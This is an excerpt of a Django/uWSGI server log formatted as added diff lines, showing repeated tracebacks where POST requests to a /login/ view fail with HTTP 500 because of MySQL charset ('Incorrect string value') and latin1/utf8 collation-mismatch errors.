+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 84/137] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:49 2021] POST /login/ => generated 209413 bytes in 102 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 85/138] 219.228.146.146 () {40 vars in 889 bytes} [Thu Jan 14 07:43:49 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 86/139] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:49 2021] POST /login/ => generated 209413 bytes in 147 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 87/140] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:50 2021] POST /login/ => generated 183350 bytes in 113 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 88/141] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:50 2021] POST /login/ => generated 183350 bytes in 87 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 89/142] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:50 2021] POST /login/ => generated 183350 bytes in 101 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
